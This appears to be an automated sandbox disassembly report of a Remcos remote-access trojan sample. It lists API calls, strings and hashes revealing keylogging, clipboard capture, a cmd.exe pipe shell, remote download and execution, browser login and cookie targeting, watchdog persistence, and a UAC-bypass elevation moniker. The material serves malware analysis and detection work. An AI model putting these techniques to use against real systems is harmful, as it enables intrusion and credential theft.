                                                            • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                            • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                            • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                          • Sleep.KERNEL32(000007D0), ref: 00407976
                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                            • Part of subcall function 0041BD82: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
                                                          Strings
                                                          • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                          • String ID: @PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $TdF$Unable to delete: $Unable to rename file!$VNG$open$pPG$pPG$pPG$pPG$NG
                                                          • API String ID: 2918587301-2537973685
                                                          • Opcode ID: 8c9b85b3cc5fd76c67877238ae870cf5e1538384d5724b3e5923403a166763a5
                                                          • Instruction ID: 1d2e2627ec10ef381271a766c0004beadc8049fa085ae304c46d09a1b017b010
                                                          • Opcode Fuzzy Hash: 8c9b85b3cc5fd76c67877238ae870cf5e1538384d5724b3e5923403a166763a5
                                                          • Instruction Fuzzy Hash: 0F42A271A043005BC614FB76C8979AE76A59F90708F40493FF946771E2EE3CAA09C6DB
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 0040508E
                                                            • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                            • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • __Init_thread_footer.LIBCMT ref: 004050CB
                                                          • CreatePipe.KERNEL32(00476D14,00476CFC,00476C20,00000000,0046656C,00000000), ref: 0040515E
                                                          • CreatePipe.KERNEL32(00476D00,00476D1C,00476C20,00000000), ref: 00405174
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476C30,00476D04), ref: 004051E7
                                                            • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                            • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                            • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,00466570,00000062,00466554), ref: 0040538E
                                                          • Sleep.KERNEL32(00000064,00000062,00466554), ref: 004053A8
                                                          • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                          • CloseHandle.KERNEL32 ref: 004053CD
                                                          • CloseHandle.KERNEL32 ref: 004053D5
                                                          • CloseHandle.KERNEL32 ref: 004053E7
                                                          • CloseHandle.KERNEL32 ref: 004053EF
                                                          Strings
                                                          • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: lG$ mG$ mG$ mG$0lG$SystemDrive$cmd.exe$xlG$xlG$xlG$xlG$xlG
                                                          • API String ID: 3815868655-3731297122
                                                          • Opcode ID: 68d87144457253b08b549f4ac4b550c69573f0e79a638d518ea1dc6d308e707a
                                                          • Instruction ID: f3d75f47542da312923ddfb9c6ddab2c5323933c8a72fe1ed5abf95ef94fff6a
                                                          • Opcode Fuzzy Hash: 68d87144457253b08b549f4ac4b550c69573f0e79a638d518ea1dc6d308e707a
                                                          • Instruction Fuzzy Hash: 3491C571600605AFC610BB65ED42A6F3BAAEB84344F01443FF949A22E2DF7D9C448F6D
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 0041101D
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00411059
                                                          • CreateThread.KERNEL32(00000000,00000000,0041170F,00000000,00000000,00000000), ref: 004110BE
                                                            • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                            • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                            • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          • CloseHandle.KERNEL32(00000000), ref: 00411068
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00411332
                                                          Strings
                                                          • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                          • String ID: 0TG$Remcos restarted by watchdog!$TdF$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 65172268-4169584339
                                                          • Opcode ID: 372d1b824043999fb3ea61122839910be527bab052fefb095489169812ad4faf
                                                          • Instruction ID: de889ccbd4d484bbc366ed6bf297281231fcf4352047712fae5372da0dd81bf3
                                                          • Opcode Fuzzy Hash: 372d1b824043999fb3ea61122839910be527bab052fefb095489169812ad4faf
                                                          • Instruction Fuzzy Hash: 3D717E3160420157C214FB72CC579AE77A8AF94719F40053FF986A21E2EF7C9A49C6AF
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                          • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                          • FindClose.KERNEL32(00000000), ref: 0040B517
                                                          Strings
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 6c2aa191b7658a53db036245a9cdec4fec9e324b839b32eec9595b3f4300475a
                                                          • Instruction ID: 4260ee55bd24f38cfaff6d718e7bb7aae0563b8f0cd35122f003610daf392ab1
                                                          • Opcode Fuzzy Hash: 6c2aa191b7658a53db036245a9cdec4fec9e324b839b32eec9595b3f4300475a
                                                          • Instruction Fuzzy Hash: 0A510B319042195ADB14F7A2DC96AEE7764EF50318F50017FF806B30E2EF789A45CA9D
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                          • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                          Strings
                                                          • API ID: Find$Close$File$FirstNext
                                                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 3527384056-432212279
                                                          • Opcode ID: c29a3aa1853b92e95312d94e519dd42d8e7ed5a614533796f0446510dfd501b9
                                                          • Instruction ID: 1e8de758c2b97f43aed4804fc6a56dd8ce4d3e4bc3adeefe5a602588f19c01c2
                                                          • Opcode Fuzzy Hash: c29a3aa1853b92e95312d94e519dd42d8e7ed5a614533796f0446510dfd501b9
                                                          • Instruction Fuzzy Hash: F4412C319042196ACB14F7A5EC569EE7768EE11318F50017FF802B31E2EF399A458A9E
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415B5F
                                                          • EmptyClipboard.USER32 ref: 00415B6D
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415B8D
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415B96
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415BCC
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00415BD5
                                                          • CloseClipboard.USER32 ref: 00415BF2
                                                          • OpenClipboard.USER32 ref: 00415BF9
                                                          • GetClipboardData.USER32(0000000D), ref: 00415C09
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415C12
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415C1B
                                                          • CloseClipboard.USER32 ref: 00415C21
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
                                                          • Opcode ID: b6601ed24abfed9cf7fe240a2c5566a7417a315aa523f1e37220b92a7528f2ec
                                                          • Instruction ID: a6dc46a1ac747b1df6f49b20b287b9a63e2ec98da8de7deae82efe0a0170cbcd
                                                          • Opcode Fuzzy Hash: b6601ed24abfed9cf7fe240a2c5566a7417a315aa523f1e37220b92a7528f2ec
                                                          • Instruction Fuzzy Hash: A82137711047009BC714BBB1DC5AAAF7669AF94B06F00443FF907A61E2EF38C945C76A
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,004750FC), ref: 0040E30B
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,004750FC), ref: 0040E336
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E352
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E3D5
                                                          • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E3E4
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E449
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 726551946-1743721670
                                                          • Opcode ID: fe7551fdfbdcf3ebe62b75ae427e45e4e23c61079ab323ff6510b1fdea246979
                                                          • Instruction ID: 57de327b15d82dbd2eac346b6cac6cdabb084366653080b34320caf9a24139d1
                                                          • Opcode Fuzzy Hash: fe7551fdfbdcf3ebe62b75ae427e45e4e23c61079ab323ff6510b1fdea246979
                                                          • Instruction Fuzzy Hash: A17150311043419BC714FB62D8529AFB7A5AFD1358F400D3EF986631E2EF389919CA9A
                                                          APIs
                                                          • _free.LIBCMT ref: 004480CC
                                                          • _free.LIBCMT ref: 004480F0
                                                          • _free.LIBCMT ref: 00448277
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          • _free.LIBCMT ref: 00448443
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: xE$xE
                                                          • API String ID: 314583886-1741595589
                                                          • Opcode ID: d596b97672170a59560d370264e130457457ea9fa8a9b0ba60a97bf2640f5a79
                                                          • Instruction ID: 53eab31d398634ed2913b9f897b2f59caf849b5b19a8cc02276c673e3ebcc531
                                                          • Opcode Fuzzy Hash: d596b97672170a59560d370264e130457457ea9fa8a9b0ba60a97bf2640f5a79
                                                          • Instruction Fuzzy Hash: 24C14731904205ABFB249F698D81AAF7BB8EF41310F2441AFE88497351EF798E42C75C
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: 52b676760061c84767d297b93dc47341045c93b1f976ba96d1747faf8790e9a2
                                                          • Instruction ID: a206eb20bee8e87b23b85030021c48398d73e585fead2f4b7fd4ae1d02439eb2
                                                          • Opcode Fuzzy Hash: 52b676760061c84767d297b93dc47341045c93b1f976ba96d1747faf8790e9a2
                                                          • Instruction Fuzzy Hash: EA61D5B4108301AEDB00EF21C862FEA77E4AF95750F44485EF591672E2DF78AA48C797
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                          • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                          • GetKeyState.USER32(00000010), ref: 00409B5C
                                                          • GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                          • ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                          • ToUnicodeEx.USER32(0047515C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID: `kG
                                                          • API String ID: 1888522110-3643241581
                                                          • Opcode ID: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                          • Instruction ID: 5852d3e9e60d78bbc7fecef5f6baa999b7b2ba0a9f64a262714a670a3ee03c46
                                                          • Opcode Fuzzy Hash: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                          • Instruction Fuzzy Hash: 3B318F72504308AFD700DF91DC45FDBB7ECEB88715F01083AB645D61A1DBB5E9488B9A
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00406788
                                                          • CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                          • Instruction ID: 6c9b37094527eb08cc4748ecdfbd23cbc672ad5faa28133fe458ce4522bc368c
                                                          • Opcode Fuzzy Hash: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                          • Instruction Fuzzy Hash: B11133B29011186ADB10FAA58955A9E77BCDB48714F11047FF905F3281E77C9A0486BD
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00475920), ref: 00419ACE
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419B1D
                                                          • GetLastError.KERNEL32 ref: 00419B2B
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00419B63
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: b6999ea4fecf3263421b7913bbd2d185f7a70e8b7a5c33fd228c391ba2809cc5
                                                          • Instruction ID: 410433f0f292194423399e5208e7b63ee2478b974df0930e3a7ace9da88798fe
                                                          • Opcode Fuzzy Hash: b6999ea4fecf3263421b7913bbd2d185f7a70e8b7a5c33fd228c391ba2809cc5
                                                          • Instruction Fuzzy Hash: C28142311043049BC314FB21DC95DAFB7A8BF94718F50492EF582621D2EF78EA09CB9A
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004752F0,00475308), ref: 0041B734
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B741
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,004752F0,00475308), ref: 0041B77B
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B78E
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                          • Instruction ID: 009c1ade3c0c7cd9a9baeecb78710ce3116f293085b5e5d3e47bbce280e6f24a
                                                          • Opcode Fuzzy Hash: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                          • Instruction Fuzzy Hash: 2931937180521CAACB20E7B19C89FDA777CAF55304F0404EBF515E2181EF799AC4CB69
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130F2
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130FE
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004132C5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004132CC
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: f9d3c1334e6b58d2f1d69f0e1f1c65ab6f379f9836b455ed853577fe27a59fe1
                                                          • Instruction ID: 0508f95716d3db9771c6b78d28bd3d55684df0f5bc265fe56362dad8d88080f3
                                                          • Opcode Fuzzy Hash: f9d3c1334e6b58d2f1d69f0e1f1c65ab6f379f9836b455ed853577fe27a59fe1
                                                          • Instruction Fuzzy Hash: CEB1A371A043006BC614FA76CC979BE76695F9471CF40063FF846B31E2EE7C9A48869B
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 004190B5
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419181
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: PSG$NG$VG$VG
                                                          • API String ID: 341183262-216422830
                                                          • Opcode ID: 83c192f71006e540b44aec1a451125091b4ed41390244d5e4dd7200b9adb984b
                                                          • Instruction ID: 0b04574543ffaf1c42473f802d0f517b04b5d48d9dde9d4f65c428d20583ff9f
                                                          • Opcode Fuzzy Hash: 83c192f71006e540b44aec1a451125091b4ed41390244d5e4dd7200b9adb984b
                                                          • Instruction Fuzzy Hash: AF8150315042405AC314FB71C8A6EEF73A8AFD0718F50493FF946671E2EF389A49C69A
APIs
  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
  • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004516D3
• IsValidCodePage.KERNEL32(00000000), ref: 0045172E
• IsValidLocale.KERNEL32(?,00000001), ref: 0045173D
• GetLocaleInfoW.KERNEL32(?,00001001,00443EFC,00000040,?,0044401C,00000055,00000000,?,?,00000055,00000000), ref: 00451785
• GetLocaleInfoW.KERNEL32(?,00001002,00443F7C,00000040), ref: 004517A4
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: (E
• API String ID: 745075371-542121585
• Opcode ID: a84efe1a2cce186fb5bbf2749623e7c2965abdb2206941bc4280497163ca2dcb
• Instruction ID: 0c55cced660072bbdea70b00f38c40adf5ab32faa3293abc4b1f14fb3cf6f882
• Instruction Fuzzy Hash: EB5193719002059BDB10EFA5CC41BBF77B8AF04706F18056BFD11EB262DB789949CB69
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• UserProfile, xrefs: 0040B227
• [Chrome StoredLogins not found], xrefs: 0040B27B
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: 485085ca9485ae7de43c789173eb7e4eeafaf3e498a45dc593bc2edb8373611b
• Instruction ID: af3d5975f8ef5736f4e1f689bc2271043fd855ebe8bb8600121af3fad6928989
• Instruction Fuzzy Hash: 5C01D63168010597CA0476B6DC6F8AF3B24E921708B10017FF802731E2FF3A9905C6DE
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
• OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
• GetLastError.KERNEL32 ref: 00416CE8
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: 594fceb9dcf720018193b7af68db4771e8a957862718425d2e1bf0ede3cec24e
• Instruction ID: cb90277d3e2bb8506008076be0b211c0c8a285b816e0fe18bd298ac82c07c5c8
• Instruction Fuzzy Hash: EEF0DA75901229BBDB109B91DC4DEEF7EBCEF05656F110065B805B20A2DE748A08CAA5
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
Yara matches
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 1bf5a653629e57a1f7b5c3ded9cb374cb4a646758b38e4d76f229b2a49b28d64
• Instruction ID: c7cd0fe6fb368e325f13a714a82e3d7b4865f9b831a19f2b9b664dd372279c0a
• Instruction Fuzzy Hash: 58C27171D046288FDB25CE28DD407EAB3B5EB84346F1541EBD84DE7242E778AE898F44
APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000310,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(00000310,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
